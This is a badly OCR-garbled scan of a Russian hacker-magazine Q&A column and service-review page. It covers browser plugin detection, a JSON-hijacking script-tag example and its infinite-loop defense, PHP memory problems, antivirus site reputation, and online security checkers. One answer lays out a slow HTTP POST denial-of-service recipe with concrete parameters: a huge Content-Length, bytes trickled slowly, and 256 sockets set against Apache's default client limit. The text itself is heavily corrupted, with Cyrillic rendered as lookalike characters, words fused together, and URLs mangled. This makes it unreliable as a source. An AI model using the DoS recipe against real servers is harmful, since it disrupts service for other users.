ницы и используюлДаѵаЗсгіріАРІ. Например, 
если в браузере клиента установлен популяр- 
ный среди разработчиков плагин РігеЬид, то 




с большой вероятностью на странице будет 
создан ^ѵаЗсгірІ-объектсопзоІе. Такие про- 
верки могут быть использованы для прицель- 
ного определения конкретныхустановленных 
плагинов, но никакнетянутна полноценный 
вариантполучения списка подключенных к 
браузеру аддонов. 

О: По какой причине некоторые веб- 
приложения используют А^АX-ответы, в 
которых первой инструкцией являются 
бесконечные циклы вроде «ѵѵЫІе(І);» 
или «й>г0;);». Для чего они нужны? 

А: Этот прием используется для того, чтобы 
избежать некоторых междоменных атак (сгозз 
сіотаіп аНаскз). Для большей ясности вотпри- 
мер атаки, которой помешает дополнительный 
«бог/ѵѵЬіІе» цикл в начале ответа. Предпо- 
ложим, некий Вася залогинен на РасеЬоок. 
Дальше Василий переходитна сайт таіѵѵаге. 
сот . Это не очень хороший ресурс, потому что в 
нем содержится опасный код: 

<зсгірД згс=" РасеЬоок. сот/ап ах/ 

іігіепсіз . ркр" /> 

боответственно, при посещении таіѵѵаге. 
сот Васин браузеротправитзапроссцена- 
риюбгіепсІз.рЬр, используя куки, которые для 
Васи создал в системе РасеЬоок. Получается, 
таіѵѵаге. сот мог бы получить доступ к списку 
Васиных друзей, но — ... если поставить в 
начало А^Х-ответа бесконечный цикл, то 
выполнение таіѵѵаге. сот попростузависнет 
во время выполнениятега зсгірі, поперх- 
нувшись «Рэг/ѵѵЬіІе» циклом. Но кактогда не 
зависает сам РасеЬоок? Выполняя А^АX-за- 
прос, он предварительно обрабатывает ответ 
и убирает оттуда первые несколько символов с 
опасной инструкцией, бторонний ресурс вроде 
таіѵѵаге. сот такую пост-обработку выполнить 
не может, потому что использует функцию 
ХМІ_НТТРРедиезІ между доменами. 

О: Какие основные проблемы могут 
возникнуть с долго выполняющимися 
РНР-процессами? 

А: Управление памятью в РНР не очень слож- 
ное, но... Поймать утечку памяти очень просто, 
бреда не занимается каким-либоуплотнением 
памяти (это специальные приемы, исполь- 
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зуемыедля перемещения информационных 
блоков в основной памяти для обеспечения 
максимального свободного пространства), так 
что тебе придется заниматься фрагментацией 
самому. Ктомужеу РНР весьма ограниченные 
возможности по контролю над распределением 
и освобождением памяти. Проблемы могут 
возникнуть также из-за дырявых модулей, хотя 
это врядлиуникально именно для РНР. 

О: Существуют ли сейчас какие-то 
серьезные недоделки в веб-серверах, 
которые может эксплуатировать зло- 
умышленник для усиления ОйоБ-атаки? 

А: Увы, да. Исследователи ВонгОн Чи иТом 
Брэннан изорганизации 0ѴѴА5Р недавно опуб- 
ликовали статью [ ѵѵѵѵѵѵ.оѵѵазр.огд/ітадегАЮ/ 
1_аѵег 7 РРОБ.рсіЯ . в которой рассказали под- 
робности реализации нового типа РРоБ-атаки 
на веб-серверы. Самая большая угроза этой 
атаке состоит в том, что проблема касается не 
какого-то конкретного веб-демона, а кроется 
непосредственно в НТТР-протоколе. Поэтому, 
чтобы полностью исправить ситуацию, скорее 
всего придется внести поправки в сам прото- 
кол, а это, как понимаешь, крайне нежелатель- 
но. Тако какой атаке идетречь? 

Атакующий устанавливает некоторое коли- 
чество подключений с веб-сервером. Каждое 
из этих подключений содержитзаголовок 
СопІепМепдіЬ, равное какому-то большому 
числу (например, СопІепІ-БепдіЬ: 10000000). 
Таким образом, веб-сервер ожидает 1 0000000 
байт для каждого такого коннекта.Трюксостоит 
в том, чтобы не отправлять все эти данные 
разом, а пересылать один символ за другим в 
течение долгого времени — скажем, по одному 
байту каждые 10-1 00 секунд. Это приведет к 
тому, что веб-сервер будет поддерживать под- 
ключения в течение долгого времени (дотех 
пор, пока не получитвсе данные). В это время 
доступ к веб-серверу для других клиентов будет 
ограничен. Большетого, они могут вообще 
остаться без возможности подключения, если 
пул возможных коннектов будет занят. Атаке 



подвержен любой сайт, который содержит фор- 
мы, т.е. может принимать НТТР РОБТ-запросы. 
Впрочем, если речь идетоб Арасбе, то в его 
случае это не является обязательным условием. 
Демон в любом случае уязвим. Разработчики 
сканнера безопасности АсипебхѴѴѴБ написали 
скрипт [ ѵѵѵѵѵѵ.асипеІіх.сопп/Ыод/ѵѵр-сопІепІ:/ 
ир[оасІ5/2010/1 іА/ѵѵз-зсгірІіпдІ .рпд ). который 
создает 256 со кето в и уста на вливает ТОР- под- 
ключение к веб-серверу, после чего, используя 
каждый из сокетов, начинает медленно отправ- 
лять данные (1 символ в секунду). Для атаки 
используется НТТР РОБТ-запрос на несущест- 
вующий файл (РОБТ/аааааааааааа НТТР/1.1). 
Уже через несколько секундтакого РРоБ’а веб- 
сервер начинаетзависать. Авторы оригиналь- 
ной статьи утверждают, что для реализации 
атаки необходимо около 20000 подключений. 
Однако, если посмотреть конфигАрасбе'а, 
то несложно найти параметр МахСІіепІз. По 
умолчанию он устанавливает 256 клиентов в 
качестве максимального лимита одновремен- 
ных подключений. Делаем выводы. 

О: Подскажи прокси-сервер, который 
мог бы инъектировать в НТТР-трафик 
необходимые мне данные, а также мо- 
дифицировать часть пакетов «на лету» 
по заданным правилам? 

А: Можно попробовать использовать Бегдіо 
Ргоху ( зрагесіосксѵсіез.огд/сіоѵѵпіоасіз/сосіе/ 
гегдіо ргоху ѵ0.1 Чаг.дД . Код полностью напи- 
сан на Руібоп и работаеттолько подлинуксом. 

О: А какую программу в команде ][ ис- 
пользуют в качестве дампера памяти? 

А: Насколько мне известно, никто велосипед 
не изобретает и используют вполне привыч- 
ные инструменты: БогсІРЕ и ОЦуОшпр. Для 
непонимающих, о чем идетречь, объясню: эти 
утилиты позволяют получить защищенный 
код, находящийся в памяти, и сохранить его на 
диск. Это процедура особенно полезна, когда 
необходимо проанализировать упакованные 
ехе-шники, которые кодируюти криптуютсвои 




инструкции, извлекая их в ОЗУ только во время 
выполнения. 

О: Как работает репутационная система 
сайтов, которую один за другим сейчас 
реализуют различные производители 
антивирусов? При посещении любого 
сайта у меня в браузере отображается 
рейтинг — «безопасный», «небезопас- 
ный», «требующий внимания». 

А: В основе этого механизма лежит, прежде 
всего, статистическая система, которая анали- 
зирует переходы пользователей на определен- 
ные сайты. Плюс анализируется содержимое 
страницы. Если какой-то пользователь пере- 
шел на страничку, атам, кпримеру, оказался 
код, загружающий трой, этотфакт добавляется 
в базу антивируса. Соответственно, ресурс 
автоматически получает«красный» (опасный) 
рейтинг. Если же пользователи антивируса 
часто посещают страницу и она «чиста», 
ресурсу присваивается «зеленая» (безопас- 
ная) репутация. Чем больше пользователей 
антивируса соглашаются участвовать в этой 
программе (а разрешение всегда спрашива- 
ется), тем лучше работает система. Помимо 
этого, антивирусные компании сами обходят 
популярные сайты и проверяютихсодержимое. 
Это выглядитпримернотак. Есть достаточно 
мощный сервер, на котором запущено доста- 
точно большое количество виртуальных машин. 
На виртуальной машине ставится непропат- 
ченный ѴѴіпсІоѵѵзХР, и эта виртуальная машина 
автоматически ходит на разные сайты. С чистой 
машины делается слепок. После посещения 
каждого сайта зпарзбоі создается повторно и 
слепки сверяются между собой. Если с систе- 
мой ничего не произошло, кромеобновления 
Тетрогагу Іпіегпеі Еі1ез(куписы, кэш ит.д.), 
стало быть, сайт чистый. Но если на компьютере 
появится какой-то файл или запись в реест- 
ре, ресурс отправляется в лабораторию для 
анализа. Чем чаще сайт посещается пользова- 
телями, тем выше он поднимается в очереди на 
сканирование. Соответственно, сканирование 
наиболее популярных ресурсов осуществляет- 
ся постоянно. 

Данные о репутации сайтов доступны онлайн: 
ІМоііоп Баів ѴѴеЬ ( за^еѵѵеЬ.погІоп.сопп ). ѴѴОТ 
( ѵѵѵѵѵѵ.туѵѵоі.сопп ). МсАбее 5М:е Асіѵізог (уѵ\длдл 
зііеасіѵізог.сопп ). Последний особенно крут, 
потому что помимо непосредственно оценки 
сайта ресурс выдает для опасных сайтов отчет, 
за что собственно они получили неприлич- 
ный рейтинг. Кпримеру, для хакер. ги можно 
получить списокфайлов, которые антивирус 
считаетопасными (ихзакачивали пользовате- 
ли и потомуони были просканированы). Более 
того, если кликнуть по одному из файлов — пус- 
кай это будет какой-нибудь файл-инсталлятор 
— сервис выдает сведен ия об изменениях в 
системе, которые происходят после его за- 
пуска. Нельзя не сказать и еще про одну фичу: 
Бііе Асіѵізог строит схему связанных доменов, 
на которых отображает связи сайта и рейтинг 
прилинкованныхс ним «соседей». НЕ 
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ВКОНТАКТЕ: АРХИТЕКТУРА СОЦИАЛЬНОЙ СЕТИ 
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Для проверки анонимности 




Экспресс-тест 
безопасности браузера 
т и расширений 



ѴѴНОЕК 

\л/\л/ѵѵ.\л/Ііоег.пеі 

О Прописанный в браузере анонимный прокси-сервер вовсе не озна- 
чает, что твой настоящий ІР-адрес останется загадкой для удаленного 
сервера. Он по-прежнему можетбыть выявлен с помощью специаль- 
ного Эаѵа-апплета или хитрого Еіазб-объекта. Есть много сервисов 
для проверки анонимности, но одним из лучших способов убедиться 
в том, что на сервер не передается ничего лишнего, является проект 
ѴѴЬоег. Он идеально подойдет для проверки Ргоху- и Эоскз-серверов, 
расскажет все отвоем ѴРЫ -сервере, проверит ІР-адрес на нахождение 
в блэк-листах, укажет, включены ли АсііѵеХ и Эаѵа, каковы языковые и 
системные настройки, какиеустановлены ОС и браузер, определит 0145 
ит.д. 
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Среда разработки 
для веб-программистов 



51ІРРРАТР0І. 

ѵѵѵѵѵѵ.зифаігоі.ги 

О Большая часть малвари загружается на компьютеры пользователей 
через уязвимости в браузерах и его плагинах. В этом несложно убедиться, 
если посмотреть содержание известных сплоит-паков. И если сами 
браузеры еще с грехом пополаму многих юзеров периодически обнов- 
ляются, то плагины (АбоЬе Веабег, 5ип Эаѵа, ОиіскТіте, АбоЬе Ріазб, 

5і Іѵегіід Ы; и другие] часто остаются без установленныхапдейтов. Сервис 
ЗшіРаІгоІот Розібѵе Тесбпоіодіез позволяет быстро пройти экспресс- 
оценку безопасности компьютера, основываясь на данных о веб-брау- 
зере и его расширениях. Если что-то необходимо обновить, ты тутже об 
этом узнаешь из результатов теста. 




5НІРТЕ0ІТ ^ѴСІІТ 

ѵѵѵѵѵѵ.зЫІІесШ.пеІ уѵ\лллфѵсиі.сопп 



О Еще один замечательный сервис в нашу копилку онлайн сервисов 
для программистов, которая придется по душе всем РНР-кодерам. 
зЫКЕЭІТ — это полноценная, реализованная через веб среда разработки 
судобным редактором кода и встроенным (5]ЕТР-клиентом для загрузки 
проекта на хостинг. Редактор поддерживает подсветку синтаксиса, 
ищетошибки в коде прямо во время набора, проверяетбаланс скобоки 
форматирует исходник, добавляя недостающиетабы и переходы срок. 
Ведетистория изменений: поэтому в любой моментможно вернуться к 
предыдущей версии файла. Адля большего удобства помимо редактора 
кода, есть еще и ѴѴУЭІѴѴУО-режим проектирования страницы. 



©Для того, чтобы заняться монтажом видео, необходим хороший 
компьютер (иначе процесс превратится в мучительную пытку] и 
удобная программа (которая, скорее всего, будет стоить денег]. ЭауСиІ: 
позволяет обойтись и без того, и без другого. Это впечатляющий редак- 
тор видео, реализованный в виде веб-сервиса. Работа с несколькими 
видео и аудиодорожками, красивые переходы между фрагментами, 
классные эффекты (вроде замедления из «Матрицы»], наложение текстуры 
на зеленый фон, запись видео напрямую с веб-камеры, возможность 
наложить рисунок-аннотацию прямо на видео — все это доступно даже 
в бесплатной версии ЭауСиі, 
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ФОКУС-ГРУППА 




Хочешь не только читать журнал, но и вместе снами делать его лучше? Ука- 
зать на наши фейлы или выразить респект за сделанную работу? Это легко. 
Вступай в ряды нашей фокус-группы и выигрывай класные подарки от жур- 
нала и наших партнеров. 



3 самых активных участника фокус-группы получат в этом месяце подписки 
на журнал Хакер: за первое место - на 12 месяцев, за второе - на 6 месяцев 
и за третье- на 3 месяца. 



РЕКЛАМА 



